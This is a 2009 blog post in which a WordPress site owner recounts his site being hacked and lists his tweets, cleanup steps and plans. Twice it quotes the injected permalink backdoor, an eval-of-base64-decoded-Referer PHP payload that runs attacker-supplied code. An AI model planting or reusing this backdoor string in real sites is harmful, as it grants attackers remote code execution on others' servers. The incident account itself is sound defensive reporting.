Update on WP hack

by Justin Souter on September 6, 2009

Intro

For those of you who follow me via my @souterconsults account, you will have seen me have a paddy on this Friday last. That’s because my WP instance got hacked. Meh :$

So, I thought it would be useful to update anyone interested with a quick run-down, as it sets the scene for any future developments (like a complete re-build: bah).

I’m setting out here:

  • List of tweets, which pretty much explain what happened
  • Brief notes of more detail
  • Other links, if they’re not in the first two sections
  • Actions. Bah

Tweets

  1. argh, wanting to publish my Cloud vids from YouTube, but WP is putting %&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/ on URL 3:15 PM Sep 4th from twhirl
  2. http://twurl.nl/06n2fh explains – I’m trying to find the malicious code asap :'( 3:42 PM Sep 4th from twhirl
  3. ok, I’ve switched off the navigation on the site & parked links to comments, archive, & recent posts to help avoid people getting borked 4:02 PM Sep 4th from twhirl
  4. Site back in action: WP Permalink config restored –http://twurl.nl/ddfchd fyi ‘Hardening WordPress’ http://twurl.nl/ih81jk 5:09 PM Sep 4th from twhirl
  5. just blogged: Cloud Computing – YouTube videos http://twurl.nl/g38ukl 5:23 PM Sep 4th from twitterfeed
  6. Links for WP hack %&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/ again – http://twurl.nl/5qclh3 & http://twurl.nl/d55o4c 5:39 PM Sep 4th from twhirl

Notes

  1. Was posting about YouTube videos on Cloud Computing
  2. Copying and pasting the URL into Twhirl to send out on Twitter
  3. Noticed there was a whole string of characters after the ‘proper’ URL
  4. Deleted post
  5. Republished
  6. It was still there
  7. Copied the string and Googled it
  8. Found “[resolved] NASTY CODE hacks onto your domain. FIX included.” #2 in ‘Tweets’
  9. Went on from there & blogged original post…

Looking at my install:

  • The plugin options table seems to have disappeared [although this may not be a bad thing – I should check the WP changelog…]
  • WP pages seem clean at the mo’

Various links

Worthwhile checking out

Actions

  • Need to do several more, more detailed trawls through my WP install
  • Probably need to do a rebuild (from scratch, preferably). Meh
  • Enabled various plugins, e.g. Login LockedDown, but Maintenance Mode didn’t work :-(

A shot across the bows, hopefully not much more (fingers tightly crossed).

[UPDATE: fyi I believe I was on WP v2.8.0 when I was hacked. Latest version at the time of writing is 2.8.4.

Technorati Tags: ,,,,,,chastened

Previous post:

Next post: